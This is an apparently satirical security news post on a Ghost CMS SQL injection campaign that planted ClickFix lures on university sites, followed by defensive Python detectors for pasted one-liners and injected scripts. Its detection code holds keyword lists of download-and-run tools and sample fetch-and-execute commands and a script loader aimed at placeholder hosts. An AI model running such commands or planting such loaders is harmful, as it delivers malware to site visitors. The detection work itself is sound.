Ghost CMS SQL Injection Compromises 700 Websites Including Harvard and Oxford — The Patch Was Available for 95 Days but the Attackers Read the Changelog First

🤚 The Open-Palm Injection

A critical SQL injection vulnerability in Ghost CMS — tracked as CVE-2026-26980 — is being actively exploited in a large-scale campaign that has already compromised over 700 websites, including domains belonging to Harvard University, Oxford University, Auburn University, and, in a particularly poetic twist, DuckDuckGo.

The vulnerability affects Ghost versions 3.24.0 through 6.19.0 and was patched back in February 2026 with version 6.19.1. The patch has been available for three months. The attackers, naturally, have been more diligent about reading the changelog than the people running the software.

The campaign was discovered by XLab threat intelligence researchers at Qianxin, with SentinelOne publishing technical details on February 27. The attack chain is a masterclass in layered exploitation:

  • Attackers exploit the SQL injection to steal Admin API keys
  • They use those keys to inject malicious JavaScript into published articles
  • The JavaScript acts as a lightweight loader that fetches second-stage code from attacker infrastructure
  • Visitors who pass the loader’s targeting checks receive a fake Cloudflare verification prompt
  • The prompt instructs users to paste commands into Windows Command Prompt
  • This drops payloads including DLL loaders, JavaScript droppers, and Electron-based malware delivered as UtilifySetup.exe

👐 The Two-Handed Postmortem

The ClickFix social engineering technique deserves special recognition here, because it represents a genuinely innovative approach to the ancient art of getting humans to destroy their own computers.

The attack presents victims with what appears to be a legitimate Cloudflare verification page — the kind you’ve clicked through a thousand times without thinking. Except this one asks you to open Command Prompt and paste in a string of text. A real Cloudflare challenge completes inside the browser; nothing legitimate about it ever involves a terminal, which is the one tell worth teaching. And people do it anyway. They do it because Cloudflare prompts are so ubiquitous that they’ve become invisible, and because the average internet user has been trained to click “Verify” on anything that stands between them and the content they want to read.
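The pasted command is the one step in this chain that leaves a clean endpoint artifact: a child of an interactive console (or of Explorer, via the Run dialog) whose command line fetches something from the internet and runs it. The Python below is an added example, not code from the article or from the researchers it cites. It scores process-creation events on several independent indicators; it assumes events carry image, parent_image and command_line (the same fields a Sysmon Event ID 1 record exposes as Image, ParentImage and CommandLine), and the sample events are constructed for the example, not the campaign’s actual commands.

```python
"""Heuristic detection of a pasted ClickFix one-liner in process telemetry.

Added example, not from the article. Assumptions: events are dicts with `image`,
`parent_image` and `command_line` (Sysmon Event ID 1 carries these as
Image/ParentImage/CommandLine); the sample events below are constructed, not real.
"""
import re

# A lure tells the victim to open cmd/PowerShell or Win+R, so the interesting
# parent is an interactive shell or Explorer rather than a service or scheduler.
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}

# Download-and-run utilities a one-liner leans on (living off the land).
DOWNLOADERS = re.compile(
    r"\b(curl|wget|bitsadmin|certutil|mshta|msiexec|Invoke-WebRequest|iwr|"
    r"Invoke-Expression|iex|DownloadString|Start-BitsTransfer)\b", re.I)
REMOTE_URL = re.compile(r"(https?:)?//[^\s'\"]+", re.I)
# Piping fetched text into an interpreter, chaining, or a long -EncodedCommand blob.
EXEC_CHAIN = re.compile(
    r"(\|\s*(cmd|powershell|iex)\b|&&|;\s*start\b|"
    r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})", re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> dict:
    """Count independent indicators; any single one is common in benign admin work."""
    cmd = event.get("command_line", "")
    reasons = []
    if _basename(event.get("parent_image", "")) in INTERACTIVE_PARENTS:
        reasons.append("spawned from an interactive shell or Explorer")
    if DOWNLOADERS.search(cmd):
        reasons.append("download/launch utility on the command line")
    if REMOTE_URL.search(cmd):
        reasons.append("remote URL on the command line")
    if EXEC_CHAIN.search(cmd):
        reasons.append("fetched content piped or chained into execution")
    return {"id": event.get("id"), "score": len(reasons), "reasons": reasons}


def flag_clickfix(events: list, threshold: int = 3) -> list:
    """Return the ids of events whose score reaches the threshold."""
    return [s["id"] for s in map(score_event, events) if s["score"] >= threshold]


# Constructed sample telemetry for the example (not observed campaign data).
SAMPLE_EVENTS = [
    {"id": "evt-1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": 'powershell -w hidden -c "iwr https://stage.invalid/x | iex"'},
    {"id": "evt-2", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe"'},
    {"id": "evt-3", "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "command_line": "curl https://api.example.org/v1/ping"},
    {"id": "evt-4", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta https://stage.invalid/a.hta"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        s = score_event(ev)
        print(s["id"], s["score"], "; ".join(s["reasons"]))
    print("flagged:", flag_clickfix(SAMPLE_EVENTS))
```

The threshold is the point: a developer running curl against an API (evt-3) or a user simply opening a console (evt-2) each trip one or two indicators, while the pasted one-liner trips three or four. Tune the parent set and the utility list to your fleet before alerting on it.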

The fact that DuckDuckGo — the privacy-focused search engine — was among the compromised domains is the kind of irony that security researchers will be dining out on for years. The website that promises to protect your privacy was, for a time, actively participating in the compromise of your system. Not on purpose, obviously. But the malware doesn’t care about your mission statement.

And then there are the universities. Harvard and Oxford — institutions that collectively charge enough tuition to fund a small nation’s defense budget — were running unpatched Ghost CMS instances three months after a critical patch was available. The irony of an Ivy League institution failing to do its homework writes itself.

🌿 The Gentle Awakening

Every major CMS vulnerability follows the same lifecycle, and it is a lifecycle that should embarrass everyone involved.

Step 1: A critical vulnerability is discovered and responsibly disclosed. Step 2: A patch is released. Step 3: The patch is ignored by approximately everyone. Step 4: Attackers read the patch notes — because they have a professional development culture — and begin mass exploitation. Step 5: Headlines. Step 6: Frantic patching. Step 7: A blog post titled “Lessons Learned” that will itself be ignored.

We are currently at Step 5. The patch for CVE-2026-26980 has been available since February 19, 2026. That is 95 days. Ninety-five days during which over 700 organizations — including some of the most prestigious academic institutions on the planet — decided that updating their CMS was not a priority. The attackers, meanwhile, had their exploit weaponized and their ClickFix infrastructure deployed before the end of the month.

The asymmetry is staggering. Defenders had 95 days and did nothing. Attackers had 8 days and built a global campaign.

👑 The Gold-Leaf Reckoning

Ghost CMS markets itself as the “professional publishing platform” — a sleek, modern alternative to WordPress for creators who want something that feels less like a construction site and more like a boutique hotel. And to its credit, the Ghost team shipped the patch promptly. The failure here is entirely on the operators.

But this campaign also highlights the growing sophistication of ClickFix as an attack vector. We’ve moved from crude pop-ups saying “YOUR COMPUTER HAS A VIRUS” to pixel-perfect replicas of Cloudflare verification flows that would fool most security professionals on a distracted Tuesday afternoon. The social engineering layer is now better designed than most legitimate UX. The attackers have a design team. The attackers have user research.

If you’re running Ghost CMS anywhere in the 3.24.0 to 6.19.0 range: update to 6.19.1 or later immediately. Then rotate your Admin API keys, because the patch closes the injection but does nothing about keys that were already stolen. Check XLab’s published indicators of compromise. Review your published posts, and any site-wide code injection, for JavaScript you did not put there. And perhaps consider setting a calendar reminder for the next time a critical patch drops, because the attackers already have one.
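To turn that checklist, and the affected version range quoted earlier, into something you can actually run, here is an added example (not Ghost’s code and not from any of the researchers cited): a Python triage helper that checks whether a reported version falls in the affected range and scans post records for script tags loading from hosts you do not recognise, or inline scripts that stage further code. It assumes post records shaped like rows of Ghost’s posts table (title, html, codeinjection_head, codeinjection_foot); the sample records and the allowlisted host are constructed for the example.

```python
"""Ghost post-compromise triage: version range check plus injected-script scan.

Added example, not Ghost's own code. Assumptions (not stated in the article):
  * post records are dicts with `title`, `html`, `codeinjection_head` and
    `codeinjection_foot`, as rows of Ghost's `posts` table expose them;
  * the operator knows which script hosts the site legitimately loads from.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Affected range as given in the article: 3.24.0 through 6.19.0, fixed in 6.19.1.
VULNERABLE_MIN = (3, 24, 0)
VULNERABLE_MAX = (6, 19, 0)

# Constructs typical of injected loaders: building a <script> at runtime, decoding
# a hidden URL, or evaluating fetched text. Heuristic, not a signature.
INLINE_MARKERS = ("createElement('script')", 'createElement("script")',
                  "atob(", "eval(", "fromCharCode", "document.write(")


def parse_version(version: str) -> tuple:
    """'6.19.0' -> (6, 19, 0); a pre-release suffix such as '-rc.1' is ignored."""
    return tuple(int(part) for part in version.split("-")[0].split("."))


def is_vulnerable_version(version: str) -> bool:
    return VULNERABLE_MIN <= parse_version(version) <= VULNERABLE_MAX


class _ScriptCollector(HTMLParser):
    """Collects (src, inline_body) for every <script> tag in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None  # None while outside a <script>

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._src, self._buf = None, None


def find_injected_scripts(post: dict, allowed_hosts: set) -> list:
    """Return (field, reason, detail) tuples for scripts that need a human look."""
    findings = []
    for field in ("html", "codeinjection_head", "codeinjection_foot"):
        fragment = post.get(field) or ""
        if "<script" not in fragment.lower():
            continue
        collector = _ScriptCollector()
        collector.feed(fragment)
        collector.close()
        for src, body in collector.scripts:
            if src:
                # urlparse handles absolute and protocol-relative (//host/x.js) URLs;
                # a bare path has no hostname and is treated as same-origin.
                host = urlparse(src.strip()).hostname
                if host and host.lower() not in allowed_hosts:
                    findings.append((field, "external script", src))
            elif any(marker in body for marker in INLINE_MARKERS):
                findings.append((field, "inline loader", body[:80]))
    return findings


def triage(posts: list, allowed_hosts: set, ghost_version: str) -> dict:
    report = {"vulnerable_version": is_vulnerable_version(ghost_version), "flagged": {}}
    for post in posts:
        hits = find_injected_scripts(post, allowed_hosts)
        if hits:
            report["flagged"][post["title"]] = hits
    return report


# Constructed sample records for the example; not content from any compromised site.
SAMPLE_POSTS = [
    {"title": "Clean post",
     "html": '<p>Hello</p><script src="https://cdn.example.org/analytics.js"></script>',
     "codeinjection_head": None, "codeinjection_foot": None},
    {"title": "Injected post",
     "html": "<p>Text</p><script>var s=document.createElement('script');"
             "s.src=atob('aHR0cHM6Ly9sb2FkZXIuaW52YWxpZC9hLmpz');"
             "document.head.appendChild(s);</script>",
     "codeinjection_head": '<script src="//loader.invalid/b.js"></script>',
     "codeinjection_foot": None},
]

if __name__ == "__main__":
    result = triage(SAMPLE_POSTS, {"cdn.example.org"}, "6.19.0")
    print("vulnerable version:", result["vulnerable_version"])
    for title, hits in result["flagged"].items():
        for field, reason, detail in hits:
            print(f"[{title}] {field}: {reason}: {detail}")
```

Feed it the post rows from your own database export or Admin API dump, and keep the allowlist honest: every external host the scan is silent about is one you have personally vouched for.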

“The SQL injection was critical, the patch was prompt, and the update schedule was aspirational. Harvard can teach you about cybersecurity frameworks in a three-credit seminar — they just can’t apply them to their own blog.” — The Slap of Wisdom Incident Response Team, reading the CVE from a fully patched Ghost instance that we updated in February like professionals